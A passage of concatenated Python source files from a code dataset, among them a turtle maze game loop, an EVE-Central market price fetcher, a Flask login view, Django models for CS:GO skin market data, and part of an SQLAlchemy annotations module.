Y AND X in the next line\r\n character = level [y][x]\r\n #Calculate the screen x,y coordinates. Furtherest left upper corner is (0,0)\r\n screen_x = -350 + (x*24)\r\n screen_y = 288 - (y*24)\r\n\r\n #check if it is an x represent a wall\r\n if character == \"X\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\wall.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"T\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\torch.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"Y\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\skeleton.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"G\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\tree.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"R\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\rock.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"V\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\cage.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n\r\n\r\n\r\n \r\n if character == \"P\": # p= player \r\n player.goto(screen_x, screen_y)\r\n\r\n if character == \"C\":\r\n coins.append(Coin(screen_x, screen_y))\r\n \r\n if character ==\"E\":\r\n enemies.append(Enemy(screen_x, screen_y,player,walls))\r\n\r\n if character ==\"D\":\r\n doors.append(Door(screen_x, screen_y))\r\n\r\n if character ==\"M\":\r\n crowns.append(Crown(screen_x, screen_y))\r\n\r\n if character ==\"H\":\r\n healings.append(Healing(screen_x, screen_y))\r\n\r\n if character ==\"F\":\r\n firescrolls.append(Firescroll(screen_x, screen_y))\r\n\r\n if character ==\"A\":\r\n armours.append(Armour(screen_x, screen_y))\r\n\r\n if character ==\"S\":\r\n swords.append(Sword(screen_x, screen_y))\r\n\r\n if character ==\"Z\":\r\n enemies.append(Enemy2(screen_x, screen_y,player,walls))\r\n\r\n\r\n if character ==\"N\":\r\n npcs.append(Npc(screen_x, screen_y))\r\n\r\n if character ==\"Q\":\r\n quests.append(Quest(screen_x, screen_y))\r\n\r\n if character ==\"B\":\r\n quest_items.append(Quest_item(screen_x, screen_y))\r\n\r\n if character ==\"I\":\r\n fake_walls.append(Fake_wall(screen_x, screen_y))\r\n\r\n if character ==\"J\":\r\n enemies.append(Enemy3(screen_x, screen_y,player,walls))\r\n\r\n if character ==\"L\":\r\n enemies.append(Enemy4(screen_x, screen_y,player,walls))\r\n\r\n if character ==\"K\":\r\n quests2.append(Quest2(screen_x, screen_y))\r\n \r\n \r\npen=Pen()\r\nplayer= Player()\r\nmissile = Missile(0, 0)\r\nmissile2 = Missile2(0, 0)\r\n\r\n\r\nsetup_maze(levels[1])\r\nmaze=(\"level1\")\r\n\r\ninfo=Info()\r\ngame=Info()\r\ngame.draw_border()\r\ngame.draw_border2()\r\ngame.draw_border3()\r\ngame.draw_border4()\r\ngame.show_rules()\r\ngame.show_gold()\r\ngame.show_armour()\r\ngame.show_weapon()\r\ninfo.show_health()\r\ninfo.show_strength()\r\ninfo.show_level()\r\ninfo.show_healthpotion()\r\ninfo.show_fire_scroll()\r\ninfo.show_exp()\r\ninfo.show_defense()\r\n\r\n\r\n#keyboard binding\r\n\r\nkeybinding(player)\r\n\r\nfor enemy in enemies:\r\n turtle.ontimer(enemy.move(walls,player),t=250)\r\n\r\n \r\n\r\n#bob=0\r\n\r\nwhile True:\r\n \r\n # bob+=1\r\n # while bob ==300:\r\n\r\n # for enemy in enemies:\r\n # turtle.ontimer(enemy.move(walls,player),t=100)\r\n # bob=0\r\n \r\n \r\n missile.move()\r\n missile2.move()\r\n\r\n for particle in particles:\r\n particle.move()\r\n \r\n for armour in armours:\r\n\r\n if player.is_collision(armour):\r\n\r\n armour.destroy()\r\n\r\n if armourupgrade==1:\r\n info.armourstats+=4\r\n game.armour=(\"Mythril Plate\")\r\n game.show_armour()\r\n info.show_defense()\r\n armourupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\armour.wav\", winsound.SND_ASYNC)\r\n\r\n if armourupgrade==0:\r\n info.armourstats+=6\r\n game.armour=(\"Steel Plate\")\r\n game.show_armour()\r\n info.show_defense()\r\n armourupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\armour.wav\", winsound.SND_ASYNC)\r\n\r\n for npc in npcs:\r\n\r\n if player.is_collision(npc): \r\n game.intro() \r\n Npc.destroy(npc)\r\n \r\n for quest in quests:\r\n\r\n if player.is_collision2(quest):\r\n if mission ==0:\r\n game.start()\r\n \r\n if mission ==1:\r\n game.end()\r\n info.exp+=quest.exp\r\n info.show_exp()\r\n Quest.destroy(quest)\r\n\r\n\r\n for quest2 in quests2:\r\n\r\n if player.is_collision2(quest2):\r\n if info.boss ==0:\r\n game.start2()\r\n \r\n if info.boss ==1:\r\n game.end2()\r\n info.exp+=200\r\n info.show_exp()\r\n Quest.destroy(quest2)\r\n\r\n for quest_item in quest_items:\r\n if player.is_collision(quest_item):\r\n mission=1\r\n Quest_item.destroy(quest_item)\r\n winsound.PlaySound(\".\\\\sound\\\\key.wav\", winsound.SND_ASYNC)\r\n \r\n\r\n for sword in swords:\r\n\r\n if player.is_collision(sword):\r\n\r\n sword.destroy()\r\n\r\n if weaponupgrade==1:\r\n info.weaponstats+=4\r\n game.weapon=(\"Mythril Sword\")\r\n game.show_weapon()\r\n info.show_strength()\r\n weaponupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\sword.wav\", winsound.SND_ASYNC)\r\n\r\n if weaponupgrade==0:\r\n info.weaponstats+=6\r\n game.weapon=(\"Steel Sword\")\r\n game.show_weapon()\r\n info.show_strength()\r\n weaponupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\sword.wav\", winsound.SND_ASYNC)\r\n\r\n for firescroll in firescrolls:\r\n\r\n if player.is_collision(firescroll):\r\n\r\n firescroll.destroy()\r\n info.fire_scroll+=1\r\n info.show_fire_scroll()\r\n winsound.PlaySound(\".\\\\sound\\\\scroll.wav\", winsound.SND_ASYNC)\r\n\r\n\r\n for healing in healings:\r\n\r\n if player.is_collision(healing):\r\n\r\n healing.destroy()\r\n info.potion+=1\r\n info.show_healthpotion()\r\n winsound.PlaySound(\".\\\\sound\\\\potion.wav\", winsound.SND_ASYNC)\r\n \r\n\r\n for crown in crowns:\r\n \r\n if player.is_collision(crown):\r\n \r\n #winsound.PlaySound(\".\\\\sound\\\\victory.wav\",0)\r\n player.destroy()\r\n crown.destroy()\r\n crowns.remove(crown)\r\n lives=3\r\n game.win()\r\n \r\n \r\n for enemy in enemies:\r\n if missile.is_collision(enemy):\r\n enemy.hp -= (info.strength+info.weaponstats)\r\n missile.status = \"ready\"\r\n winsound.PlaySound(\".\\\\sound\\\\orkdeath.wav\", winsound.SND_ASYNC)\r\n\r\n if missile2.is_collision(enemy):\r\n enemy.hp -= missile2.damage\r\n missile2.status = \"ready\"\r\n winsound.PlaySound(\".\\\\sound\\\\orkdeath.wav\", winsound.SND_ASYNC)\r\n\r\n\r\n if enemy.hp<=0 and enemy.alive==True:\r\n enemy.alive=False \r\n Enemy.destroy(enemy)\r\n missile.status = \"ready\"\r\n info.exp += enemy.exp\r\n info.boss+=enemy.boss\r\n info.kill+=1\r\n info.show_exp()\r\n winsound.PlaySound(\".\\\\sound\\\\orkdeath.wav\", winsound.SND_ASYNC)\r\n\r\n if info.exp>70 and info.level2_claimed:\r\n info.hp=1100\r\n info.fullhp=1100\r\n info.strength=20\r\n info.defense=4\r\n info.level=2\r\n info.level2_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n \r\n\r\n if info.exp>150 and info.level3_claimed:\r\n info.hp=1200\r\n info.fullhp=1200\r\n info.strength=25\r\n info.defense=8\r\n info.level=3\r\n info.level3_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n \r\n if info.exp>300 and info.level4_claimed:\r\n info.hp=1300\r\n info.fullhp=1300\r\n info.strength=30\r\n info.defense=12\r\n info.level=4\r\n info.level4_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n \r\n\r\n if info.exp>450 and info.level5_claimed:\r\n info.hp=1500\r\n info.fullhp=1500\r\n info.strength=40\r\n info.defense=20\r\n info.level=5\r\n info.level5_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n\r\n if info.exp>700 and info.level6_claimed:\r\n info.hp=1700\r\n info.fullhp=1700\r\n info.strength=60\r\n info.defense=25\r\n info.level=6\r\n info.level6_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n\r\n if info.exp>950 and info.level7_claimed:\r\n info.hp=2000\r\n info.fullhp=2000\r\n info.strength=80\r\n info.defense=30\r\n info.level=7\r\n info.level7_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC) \r\n time.sleep(1)\r\n\r\n if info.exp>1400 and info.level8_claimed:\r\n info.hp=2200\r\n info.fullhp=2200\r\n info.strength=100\r\n info.defense=50\r\n info.level=8\r\n info.level8_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC) \r\n time.sleep(1)\r\n \r\n for coin in coins:\r\n if player.is_collision(coin):\r\n game.gold += coin.gold\r\n game.show_gold()\r\n #print(\"Player Gold: {}\".format (game.gold))\r\n coin.destroy()\r\n coins.remove(coin)\r\n winsound.PlaySound(\".\\\\sound\\\\coin.wav\", winsound.SND_ASYNC)\r\n\r\n for enemy in enemies:\r\n if player.is_collision(enemy):\r\n attack=enemy.damage\r\n reduce_damage=attack-(info.defense+game.armourstats)\r\n if reduce_damage <0 :\r\n reduce_damage=0\r\n\r\n info.hp-=reduce_damage\r\n info.show_health()\r\n\r\n for particle in particles:\r\n particle.explode(player.xcor(), player.ycor())\r\n\r\n for door in doors:\r\n if player.is_collision(door):\r\n walls.clear()\r\n pen.clear()\r\n wn.bgpic(\".\\\\art\\\\black.gif\")\r\n for enemy in enemies:\r\n Enemy.destroy(enemy)\r\n for coin in coins:\r\n Coin.destroy(coin)\r\n for door in doors:\r\n Door.destroy(door)\r\n for armour in armours:\r\n Armour.destroy(armour)\r\n for sword in swords:\r\n Sword.destroy(sword)\r\n for healing in healings:\r\n Healing.destroy(healing)\r\n for firescroll in firescrolls:\r\n Firescroll.destroy(firescroll)\r\n for npc in npcs:\r\n Npc.destroy(npc)\r\n for quest in quests:\r\n Quest.destroy(quest)\r\n for quest_item in quest_items:\r\n Quest_item.destroy(quest_item)\r\n for fake_wall in fake_walls:\r\n Fake_wall.destroy(fake_wall)\r\n for quest2 in quests2:\r\n Quest2.destroy(quest2)\r\n \r\n winsound.PlaySound(\".\\\\sound\\\\unlock.wav\", winsound.SND_ASYNC)\r\n \r\n if maze==(\"level1\"):\r\n \r\n setup_maze(levels[2])\r\n maze=(\"level2\")\r\n \r\n \r\n elif maze ==(\"level2\"):\r\n setup_maze(levels[3])\r\n maze=(\"level3\")\r\n \r\n \r\n elif maze==(\"level3\"):\r\n setup_maze(levels[4])\r\n maze=(\"level4\")\r\n \r\n\r\n elif maze==(\"level4\"):\r\n setup_maze(levels[5])\r\n maze=(\"level5\")\r\n\r\n elif maze==(\"level5\"):\r\n setup_maze(levels[6])\r\n maze=(\"level6\")\r\n\r\n elif maze==(\"level6\"):\r\n setup_maze(levels[7])\r\n maze=(\"level7\")\r\n\r\n elif maze==(\"level7\"):\r\n setup_maze(levels[8])\r\n maze=(\"level8\") \r\n \r\n else:\r\n pass\r\n \r\n for enemy in enemies:\r\n turtle.ontimer(enemy.move(walls,player),t=250)\r\n \r\n if info.hp<=0:\r\n game.dead()\r\n player.destroy()\r\n winsound.PlaySound(\".\\\\sound\\\\death.wav\", winsound.SND_ASYNC)\r\n time.sleep(2)\r\n info.show_health()\r\n break\r\n \r\n wn.update()\r\n","sub_path":"misc/enemy game.py","file_name":"enemy game.py","file_ext":"py","file_size_in_byte":26797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65714848","text":"from xml.dom import minidom\nfrom google.appengine.api import memcache, urlfetch\n\nclass api(object):\n '''\n classdocs\n '''\n\n def readType(self, data):\n buyOrderPrice = data.getElementsByTagName('buy')[0].getElementsByTagName('max')[0].firstChild.data\n sellOrderPrice = data.getElementsByTagName('sell')[0].getElementsByTagName('min')[0].firstChild.data\n memcache.Client().set('Price/%s' % (data.getAttribute('id')),[float(buyOrderPrice), float(sellOrderPrice)],time=3600)\n #print data.getAttribute('id') + \": \" + buyOrderPrice, sellOrderPrice\n \n def httpGetPricesXML(self,itemIDs):\n params = ''\n cache = memcache.Client()\n for item in itemIDs:\n if cache.get('Price/%s' % item) is None:\n params += 'typeid=%s&' % (item)\n if params != '':\n params += 'usesystem=30000142' #Jita system\n response = urlfetch.fetch(url='http://api.eve-central.com/api/marketstat?%s' % (params),method=urlfetch.GET,deadline=60)\n if response.status_code == 200:\n result = response.content\n else:\n raise ValueError('HTTP Request failed with status code %s' % response.status_code)\n else:\n result = None\n return result\n \n def getPrice(self, itemIDs):\n if type(itemIDs) is str:\n items = [int(itemIDs)]\n elif type(itemIDs) is long:\n items = [int(itemIDs)]\n elif type(itemIDs) is int:\n items = [itemIDs]\n elif type(itemIDs) is list:\n items = itemIDs\n \n items = self.unique(items)\n xmlresponse = self.httpGetPricesXML(items)\n if xmlresponse is not None: \n doc = minidom.parseString(xmlresponse)\n if doc.documentElement.tagName == 'evec_api':\n for each in doc.getElementsByTagName(\"type\"):\n self.readType(each)\n \n def unique(self, seq):\n seen = set()\n seen_add = seen.add\n return [ x for x in seq if x not in seen and not seen_add(x)]","sub_path":"evecentralapi.py","file_name":"evecentralapi.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"6559203","text":"\nfrom flask import render_template,flash,redirect\nfrom app import app\nfrom forms import LoginForm\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\n\t#fake user object\n\tuser = {'nickname':'ming'}\n\n\tposts = [\n\t\t\t{\n\t\t\t\t'author':{'nickname':'John'},\n\t\t\t\t'body':'Beautiful day in AnHui'\n\t\t\t},\t\n\t\t\t{\n\t\t\t\t'author':{'nickname':'Bing'},\n\t\t\t\t'body':'The Avengers movie was so cool!'\n\t\t\t}\n\t\t]\n\treturn render_template('index.html',title='Home',user=user,posts = posts)\n\n@app.route('/login',methods=['GET','POST'])\ndef login():\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\t#flash('Login requested for OpenID=%s,remember_me=%s '\\\n\t\t#\t\t%(form.openid.data,str(form.remember_me.data)))\n\t\t\n\t\tflash('Login requested for OpenID=%s,remember_me=%s '\\\n\t\t\t\t%(form.openid.data,str(form.remember_me.data)))\n\t\treturn redirect('/index')\n\treturn render_template('login.html',title='Sigin In',\\\n\t\t\tform = form,providers=app.config['OPENID_PROVIDERS'])\n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195720855","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\nclass Collection(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n\n class Meta:\n managed = False\n db_table = 'Collection'\n\nclass WeaponModel(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n\n class Meta:\n managed = False\n db_table = 'WeaponModel'\n\nclass WeaponGrade(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n rank = models.IntegerField(db_column='Rank', null=True)\n name = models.CharField(db_column='Name', null=True)\n\n class Meta:\n managed = False\n db_table = 'WeaponGrade'\n\nclass CollectionItem(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n float_min = models.DecimalField(db_column='FloatMin', max_digits=5, decimal_places=3)\n float_max = models.DecimalField(db_column='FloatMax', max_digits=5, decimal_places=3)\n stat_trak = models.BooleanField(db_column='StatTrak')\n souvenir = models.BooleanField(db_column='Souvenir')\n factory_new = models.BooleanField(db_column='FactoryNew')\n minimal_wear = models.BooleanField(db_column='MinimalWear')\n field_tested = models.BooleanField(db_column='FieldTested')\n well_worn = models.BooleanField(db_column='WellWorn')\n battle_scarred = models.BooleanField(db_column='BattleScarred')\n collection = models.ForeignKey(Collection, db_column='Collection')\n weapon_grade = models.ForeignKey(WeaponGrade, db_column='WeaponGrade')\n weapon_model = models.ForeignKey(WeaponModel, db_column='WeaponModel')\n\n class Meta:\n managed = False\n db_table = 'CollectionItem'\n\nclass SteamMarketUrl(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n url = models.CharField(db_column='Url', null=True)\n market_hash_name = models.CharField(db_column='market_hash_name', null=True)\n stat_trak = models.BooleanField(db_column='StatTrak')\n souvenir = models.BooleanField(db_column='Souvenir')\n factory_new = models.BooleanField(db_column='FactoryNew')\n minimal_wear = models.BooleanField(db_column='MinimalWear')\n field_tested = models.BooleanField(db_column='FieldTested')\n well_worn = models.BooleanField(db_column='WellWorn')\n battle_scarred = models.BooleanField(db_column='BattleScarred')\n collection_item = models.ForeignKey(CollectionItem, db_column='CollectionItem')\n\n class Meta:\n managed = False\n db_table = 'SteamMarketUrl'\n\nclass MarketData(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n price = models.DecimalField(db_column='Price', max_digits=8, decimal_places=3)\n currency_id = models.IntegerField(db_column='CurrencyId', null=True)\n time_seen = models.DateTimeField(db_column='TimeSeen')\n market_url = models.ForeignKey(SteamMarketUrl, db_column='MarketUrl')\n\n class Meta:\n managed = False\n db_table = 'MarketData'\n\nclass Currency(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n exchange_rate = models.DecimalField(db_column='ExchangeRate', max_digits=16, decimal_places=8)\n\n class Meta:\n managed = False\n db_table = 'Currency'\n\nclass LatestPrice(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n steam_market_url = models.ForeignKey(SteamMarketUrl, db_column='SteamMarketUrl')\n average_price = models.DecimalField(db_column='AveragePrice', max_digits=8, decimal_places=3)\n time_seen = models.DateTimeField(db_column='TimeSeen')\n\n class Meta:\n managed = False\n db_table = 'LatestPrice'\n","sub_path":"www/bin/csgoskin/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148803966","text":"\"\"\"DataConvert \n\nThe DataConvert class just a service that class convert data in different format.\nIn this class we are reading DAT, STM and ecodedXmlFile\n\n\"\"\"\n\n# importing for libraries\nimport numpy\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom xml.etree import ElementTree\nimport base64\nimport urllib2\nimport xmltodict\nfrom core.services.DatabaseConnection import *\nfrom core.persistence.CostData import *\n\nclass DataConvert: \n \"\"\"Reading DAT, STM and ecodedXmlFile file.\n\n This class convert data and reading DAT, STM and ecodedXmlFile from specific folder location\n\n \"\"\"\n\n @staticmethod\n def readSTM(lane, user_folder, n): \n \"\"\"Reading STM value from CSV and return detail of particular lane.\n Note:\n This is static method so call this function by statically\n like DataConvert.readSTM.\n Args:\n lane(str): the name of the lane.\n user_folder(str): the user_folder is folder location (location of the files)\n n(int): n is number of days\n Returns:\n context (this is combination of two values tableData and recent_cost_table_data)\n \"\"\" \n try:\n origin = lane[:4] # Origin_PR\n dest = lane[-4:] # Dest_PR\n\n #make connection with database\n con = DatabaseConnection.connectWithDB()\n\n #get query result \n input_df = CostData.queryToGetCostData(origin, dest, n, con)\n #close database connection\n con.close()\n\n input_df['PR_Lane'] = input_df['Origin_PR'] + input_df['Dest_PR']\n\n if input_df.empty:\n context = {'tableData': '', 'recent_cost_table_data': ''}\n else:\n slice2 = input_df[[\"CreateDate_EST\", 'PR_Lane', 'Carrier_Name', 'Customer_LHL']]\n sorted_array = slice2.sort([\"CreateDate_EST\"], ascending=False)\n g = sorted_array.groupby(['PR_Lane', 'Carrier_Name'])\n recent = (g['Customer_LHL'].first()).astype(float)\n # get second last record\n nth = (g.nth(1).fillna(value=0).reset_index())\n # get sum of accepted data\n countAccepted = (g['Carrier_Name'].count())\n # get top 10 records\n final = pd.DataFrame({'countAccepted': countAccepted, 'LH_COST_RECENT': recent}).fillna(\n value=0).reset_index()\n fData = []\n # sort according to the recent cost\n fData = final.sort([\"LH_COST_RECENT\"], ascending=True).head(10)\n # convert data frame to array\n nparray = numpy.array(fData)\n tableData = nparray.tolist()\n # second recent record from data frame to an array\n recent_cost = nth\n recent_cost_array = numpy.array(recent_cost)\n recent_cost_table_data = recent_cost_array.tolist()\n\n context = {'tableData': tableData, 'recent_cost_table_data': recent_cost_table_data}\n return context\n except:\n context = {'tableData': '', 'recent_cost_table_data': ''}\n return context\n\n","sub_path":"core/services/DataConvert.py","file_name":"DataConvert.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622480001","text":"#! /usr/bin/env python\n\nfrom scipy.io import wavfile\nfrom scipy.interpolate import interp1d\nimport damage, recognize, utils, evaluate\n\nsample_rate, samples = wavfile.read('songs/hakuna_matata.wav')\n\nnewsamples = samples.copy()\ndamage.zerofill(newsamples, 0.5)\nwavfile.write('songs/zerofill_hakuna_matata.wav', sample_rate, newsamples)\n\nmatches = recognize.cheat(samples, newsamples, false_negatives=0.01)\nvalidx, validy = utils.tovalidxy(newsamples, matches)\nf = interp1d(validx, validy, fill_value='extrapolate')\n\ninvalidx = utils.invalidx(matches)\nfixedy = f(invalidx)\n\nutils.replace(newsamples, invalidx, fixedy)\nwavfile.write('songs/zerofill_cheat_linear_hakuna_matata.wav', sample_rate, newsamples)\n\nevaluate.study(samples, newsamples, matches=matches)\n","sub_path":"investigation/wav/linear.output.example.py","file_name":"linear.output.example.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"208803918","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom utils import FileManager\nfrom os import path as os_path\nimport os, io\nimport sys\nimport shutil\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nrootDir = \"../我的对对对源文件innerclass\"\ndestDir = \"../app/src/main/java/\"\nmapping = {}\n\n\nclass item:\n def __init__(self):\n self.value = ''\n self.isSubclass = False\n\ndef traversal(basicDir):\n getMapping()\n fileList = FileManager.lsAllFile(basicDir)\n for f in fileList:\n alter(f)\n\n\ndef getMapping():\n for line in open(\"replacemap.txt\", \"r\"): # 设置文件对象并读取每一行文件\n array = line.strip().split(',', 1)\n mapping[array[0]] = array[1]\n print(\"mapping: \" + str(mapping))\n\n\ndef alter(file):\n if os_path.basename(file).startswith(\".\") :\n return\n\n new_file = file.replace(rootDir, destDir)\n b, new_file = replaceString(new_file)\n if not os.path.exists(os_path.dirname(new_file)):\n os.makedirs(os_path.dirname(new_file))\n\n if os.path.exists(new_file):\n os.remove(new_file)\n\n with io.open(file, \"r\", encoding=\"utf-8\") as f1, io.open(new_file, \"w\", encoding=\"utf-8\") as f2:\n for line in f1:\n has_replace, newline = replaceString(line)\n if has_replace:\n print(\"alterfile: \" + line + \" - > \" + newline)\n f2.write(newline)\n\n f1.close()\n f2.close()\n\n\ndef replaceString(line):\n needNotice = line.startswith(\"import \")\n has_replace = False\n old_line = line\n for old, new in mapping.items():\n if old in line:\n has_replace = True\n if needNotice and len(new.split('.')) > 1:\n new = new.rsplit('.', 1)[0]\n line = line.replace(old, new)\n\n # if has_replace:\n # print(\"replaceString: \" + old_line + \" - > \" + line)\n return has_replace, line\n\n\nif __name__ == '__main__':\n print(\"start replacement\")\n if os.path.exists(destDir):\n shutil.rmtree(destDir) # 递归删除文件夹\n else:\n os.makedirs(destDir)\n traversal(rootDir)\n","sub_path":"py/replacejava.py","file_name":"replacejava.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489704070","text":"\"\"\"\nSQLAlchemy attribute annotations\n--------------------------------\n\nAnnotations are strings attached to attributes that serve as a programmer\nreference on how those attributes are meant to be used. They can be used to\nindicate that a column's value should be :attr:`immutable` and should never\nchange, or that it's a :attr:`cached` copy of a value from another source\nthat can be safely discarded in case of a conflict.\n\nThis module's exports may be imported via :mod:`coaster.sqlalchemy`.\n\nSample usage::\n\n from coaster.db import db\n from coaster.sqlalchemy import annotation_wrapper, immutable\n\n natural_key = annotation_wrapper('natural_key', \"Natural key for this model\")\n\n class MyModel(db.Model):\n __tablename__ = 'my_model'\n id = immutable(db.Column(db.Integer, primary_key=True))\n name = natural_key(db.Column(db.Unicode(250), unique=True))\n\n @classmethod\n def get(cls, **kwargs):\n for key in kwargs:\n if key in cls.__column_annotations__[natural_key.name]:\n return cls.query.filter_by(**{key: kwargs[key]}).one_or_none()\n\nAnnotations are saved to the model's class as a ``__column_annotations__``\ndictionary, mapping annotation names to a list of attribute names, and to a\nreverse lookup ``__column_annotations_by_attr__`` of attribute names to annotations.\n\"\"\"\n\nfrom collections.abc import Hashable\nfrom typing import Any, Dict\n\nfrom sqlalchemy import event\nfrom sqlalchemy.orm import ColumnProperty, RelationshipProperty, SynonymProperty, mapper\nfrom sqlalchemy.orm.attributes import QueryableAttribute\nfrom sqlalchemy.schema import SchemaItem\n\nfrom ..signals import coaster_signals\n\ntry: # SQLAlchemy >= 1.4\n from sqlalchemy.orm import MapperProperty # type: ignore[attr-defined]\nexcept ImportError: # SQLAlchemy < 1.4\n from sqlalchemy.orm.interfaces import MapperProperty\n\n__all__ = ['annotations_configured', 'annotation_wrapper']\n\n# Global dictionary for temporary storage of annotations until the\n# mapper_configured events\n__cache__: Dict[Any, list] = {}\n\n# --- Signals -----------------------------------------------------------------\n\nannotations_configured = coaster_signals.signal(\n 'annotations-configured',\n doc=\"Signal raised after all annotations on a class are configured\",\n)\n\n\n# --- SQLAlchemy signals for base class ---------------------------------------\n\n\n@event.listens_for(mapper, 'mapper_configured')\ndef _configure_annotations(mapper_, cls):\n \"\"\"\n Extract annotations from attributes.\n\n Run through attributes of the class looking for annotations from\n :func:`annotation_wrapper` and add them to :attr:`cls.__column_annotations__`\n and :attr:`cls.__column_annotations_by_attr__`\n \"\"\"\n annotations = {}\n annotations_by_attr = {}\n\n # An attribute may be defined more than once in base classes. Only handle the first\n processed = set()\n\n # Loop through all attributes in the class and its base classes,\n # looking for annotations\n for base in cls.__mro__:\n for name, attr in base.__dict__.items():\n if name in processed or name.startswith('__'):\n continue\n\n if isinstance(attr, QueryableAttribute) and isinstance(\n getattr(attr, 'original_property', None), SynonymProperty\n ):\n # Skip synonyms\n data = None\n # 'data' is a list of string annotations\n elif isinstance(attr, Hashable) and attr in __cache__:\n data = __cache__[attr]\n elif hasattr(attr, '_coaster_annotations'):\n data = attr._coaster_annotations\n elif isinstance(\n attr, (QueryableAttribute, RelationshipProperty, MapperProperty)\n ):\n if attr.property in __cache__:\n data = __cache__[attr.property]\n elif '_coaster_annotations' in attr.info:\n data = attr.info['_coaster_annotations']\n elif hasattr(attr.property, '_coaster_annotations'):\n data = getattr(attr.property, '_coaster_annotations')\n else:\n data = None\n else:\n data = None\n if data is not None:\n annotations_by_attr.setdefault(name, []).extend(data)\n for a in data:\n annotations.setdefault(a, []).append(name)\n processed.add(name)\n\n # Classes specifying ``__column_annotations__`` directly isn't supported,\n # so we don't bother preserving existing content, if any.\n if annotations:\n cls.__column_annotations__ = annotations\n if annotations_by_attr:\n cls.__column_annotations_by_attr__ = annotations_by_attr\n annotations_configured.send(cls)\n\n\n# --- Helpers -----------------------------------------------------------------\n\n\ndef annotation_wrapper(annotation, doc=None):\n \"\"\"Define an annotation, which can be applied to attributes in a database model.\"\"\"\n\n def decorator(attr):\n __cache__.setdefault(attr, []).append(annotation)\n # Also mark the annotation on the object itself. This will\n # fail if the object has a restrictive __slots__, but it's\n # required for some objects like Column because SQLAlchemy copies\n # them in subclasses, changing their hash and making them\n # undiscoverable via the cache.\n if isinstance(attr, SynonymProperty):\n raise TypeError(\n \"Synonyms cannot have annotations; set it on the referred attribute\"\n )\n if isinstance(attr, (SchemaItem, ColumnProperty, MapperProperty)):\n attr.info.setdefault('_coaster_annotations', []).append(annotation)\n else:\n try:\n if not 